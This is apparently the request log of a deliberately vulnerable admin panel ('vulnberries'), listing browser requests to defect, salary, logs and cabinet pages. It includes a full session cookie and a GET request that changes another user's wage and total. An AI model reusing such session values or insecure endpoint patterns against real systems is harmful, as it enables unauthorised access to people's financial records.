Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=0
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Cookie: auth=sess_1774024316193140004; user_id=1
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /
URL: /
Method: GET
[2026-03-20 16:36:13] === HTTP Request ===
[2026-03-20 16:36:04] Logs page accessed - IP: 172.30.0.12:54884
===================
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Mode: cors
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Sec-Gpc: 1
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774024316193140004; user_id=1
Accept: */*
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /logs
URL: /logs
Method: GET
[2026-03-20 16:36:04] === HTTP Request ===
[2026-03-20 16:35:50] Salary page accessed - IP: 172.30.0.12:54884
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774024316193140004; user_id=1
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /salary
URL: /salary
Method: GET
[2026-03-20 16:35:50] === HTTP Request ===
===================
Via: 2.0 Caddy
Te: trailers
Cookie: auth=sess_1774024316193140004; user_id=1
Sec-Gpc: 1
Sec-Fetch-Dest: script
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-03-20 16:35:36] === HTTP Request ===
[2026-03-20 16:35:36] Goods page accessed - IP: 172.30.0.12:54884
===================
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Priority: u=0
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Sec-Gpc: 1
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /goods
URL: /goods
Method: GET
[2026-03-20 16:35:36] === HTTP Request ===
[2026-03-20 16:35:34] Main page accessed - IP: 172.30.0.12:54884
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Te: trailers
Priority: u=0
Cookie: auth=sess_1774024316193140004; user_id=1
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /
URL: /
Method: GET
[2026-03-20 16:35:34] === HTTP Request ===
[2026-03-20 16:35:28] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:54884
===================
X-Forwarded-For: 79.139.135.199
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Priority: u=5, i
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-20 16:35:28] === HTTP Request ===
[2026-03-20 16:35:28] Defect detail page accessed - defect_id: 681a7a29-68b5-4c85-b15c-8b8462683d26, IP: 172.30.0.12:54884
===================
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
X-Forwarded-Proto: https
Te: trailers
Sec-Gpc: 1
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /defects/681a7a29-68b5-4c85-b15c-8b8462683d26
URL: /defects/681a7a29-68b5-4c85-b15c-8b8462683d26
Method: GET
[2026-03-20 16:35:28] === HTTP Request ===
[2026-03-20 16:35:25] Defects page accessed - IP: 172.30.0.12:54884
===================
X-Forwarded-Proto: https
Priority: u=0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Gpc: 1
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:35:25] === HTTP Request ===
[2026-03-20 16:35:21] Main page accessed - IP: 172.30.0.12:54884
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /
URL: /
Method: GET
[2026-03-20 16:35:21] === HTTP Request ===
[2026-03-20 16:33:26] Main page accessed - IP: 172.30.0.12:34528
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Encoding: gzip, deflate, br
Priority: u=0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34528
Path: /
URL: /
Method: GET
[2026-03-20 16:33:26] === HTTP Request ===
[2026-03-20 16:33:23] Defects page accessed - IP: 172.30.0.12:34528
===================
Te: trailers
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
X-Forwarded-Proto: https
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34528
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:33:23] === HTTP Request ===
[2026-03-20 16:33:19] Logs page accessed - IP: 172.30.0.12:36764
===================
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Gpc: 1
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36764
Path: /logs
URL: /logs
Method: GET
[2026-03-20 16:33:19] === HTTP Request ===
[2026-03-20 16:33:19] Logs page accessed - IP: 172.30.0.12:54884
===================
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774024316193140004; user_id=1
Accept: */*
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /logs
URL: /logs
Method: GET
[2026-03-20 16:33:19] === HTTP Request ===
[2026-03-20 16:33:15] Logs page accessed - IP: 172.30.0.12:54884
===================
Accept-Encoding: gzip, deflate, br
Te: trailers
Cookie: auth=sess_1774024316193140004; user_id=1
Priority: u=0
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Dest: empty
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /logs
URL: /logs
Method: GET
[2026-03-20 16:33:15] === HTTP Request ===
===================
Te: trailers
Accept: */*
X-Forwarded-Proto: https
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Sec-Gpc: 1
Sec-Fetch-Mode: no-cors
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-20 16:33:11] === HTTP Request ===
[2026-03-20 16:33:11] Salary page accessed - IP: 172.30.0.12:54884
===================
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Gpc: 1
Priority: u=0
Accept-Encoding: gzip, deflate, br
Accept: */*
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
X-Forwarded-For: 79.139.135.199
Te: trailers
Cookie: auth=sess_1774024316193140004; user_id=1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /salary
URL: /salary
Method: GET
[2026-03-20 16:33:11] === HTTP Request ===
[2026-03-20 16:33:09] Defects page accessed - IP: 172.30.0.12:54884
===================
Sec-Gpc: 1
Priority: u=0
Cookie: auth=sess_1774024316193140004; user_id=1
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Accept: */*
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:33:09] === HTTP Request ===
[2026-03-20 16:33:08] Media proxy request - url: https://media.vulnberries.ru/media?filename=2, IP: 172.30.0.12:54884
===================
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Via: 2.0 Caddy
Sec-Gpc: 1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: empty
Priority: u=4
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Method: GET
[2026-03-20 16:33:08] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1774024316193140004; user_id=1
Accept: */*
Via: 2.0 Caddy
Te: trailers
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /static/defect_detail.js
URL: /static/defect_detail.js
Method: GET
[2026-03-20 16:33:08] === HTTP Request ===
[2026-03-20 16:33:08] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:54884
===================
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Site: same-origin
Priority: u=0
Sec-Gpc: 1
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774024316193140004; user_id=1
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-20 16:33:08] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Gpc: 1
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Sec-Fetch-Dest: script
Via: 2.0 Caddy
Te: trailers
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-20 16:33:03] === HTTP Request ===
[2026-03-20 16:33:03] Defects page accessed - IP: 172.30.0.12:54884
===================
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Priority: u=0
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Te: trailers
Sec-Gpc: 1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:33:03] === HTTP Request ===
[2026-03-20 16:32:57] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Priority: u=0
Accept: */*
Cookie: auth=sess_1774024316193140004; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-20 16:32:57] === HTTP Request ===
[2026-03-20 16:32:57] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Priority: u=0
Cookie: auth=sess_1774024316193140004; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
Te: trailers
Sec-Gpc: 1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-20 16:32:57] === HTTP Request ===
[2026-03-20 16:32:55] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:54884
===================
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Cookie: auth=sess_1774024316193140004; user_id=1
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Gpc: 1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
Priority: u=0
Accept-Encoding: gzip, deflate, br
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-20 16:32:55] === HTTP Request ===
[2026-03-20 16:32:54] Main page accessed - IP: 172.30.0.12:54884
===================
Sec-Fetch-Mode: cors
Accept: */*
Sec-Gpc: 1
Te: trailers
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Cookie: auth=sess_1774024316193140004; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /
URL: /
Method: GET
[2026-03-20 16:32:54] === HTTP Request ===
===================
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 212.102.62.170
Sec-Gpc: 1
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40754
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-20 16:17:46] === HTTP Request ===
[2026-03-20 16:17:46] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:40754
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 212.102.62.170
Te: trailers
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Priority: u=4
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40754
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-20 16:17:46] === HTTP Request ===
[2026-03-20 16:17:31] Login page accessed - IP: 172.30.0.12:40754
===================
X-Forwarded-For: 212.102.62.170
Te: trailers
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: navigate
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40754
Path: /login
URL: /login
Method: GET
[2026-03-20 16:17:31] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: image
X-Forwarded-Proto: https
Sec-Gpc: 1
Sec-Fetch-Mode: no-cors
Priority: u=6
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 212.102.62.170
Via: 2.0 Caddy
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40754
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 16:17:30] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept: */*
Sec-Gpc: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 212.102.62.170
Te: trailers
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40754
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-20 16:17:30] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Gpc: 1
Sec-Fetch-Dest: script
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Proto: https
Te: trailers
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 212.102.62.170
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 16:17:30] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 212.102.62.170
Via: 2.0 Caddy
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: style
Priority: u=2
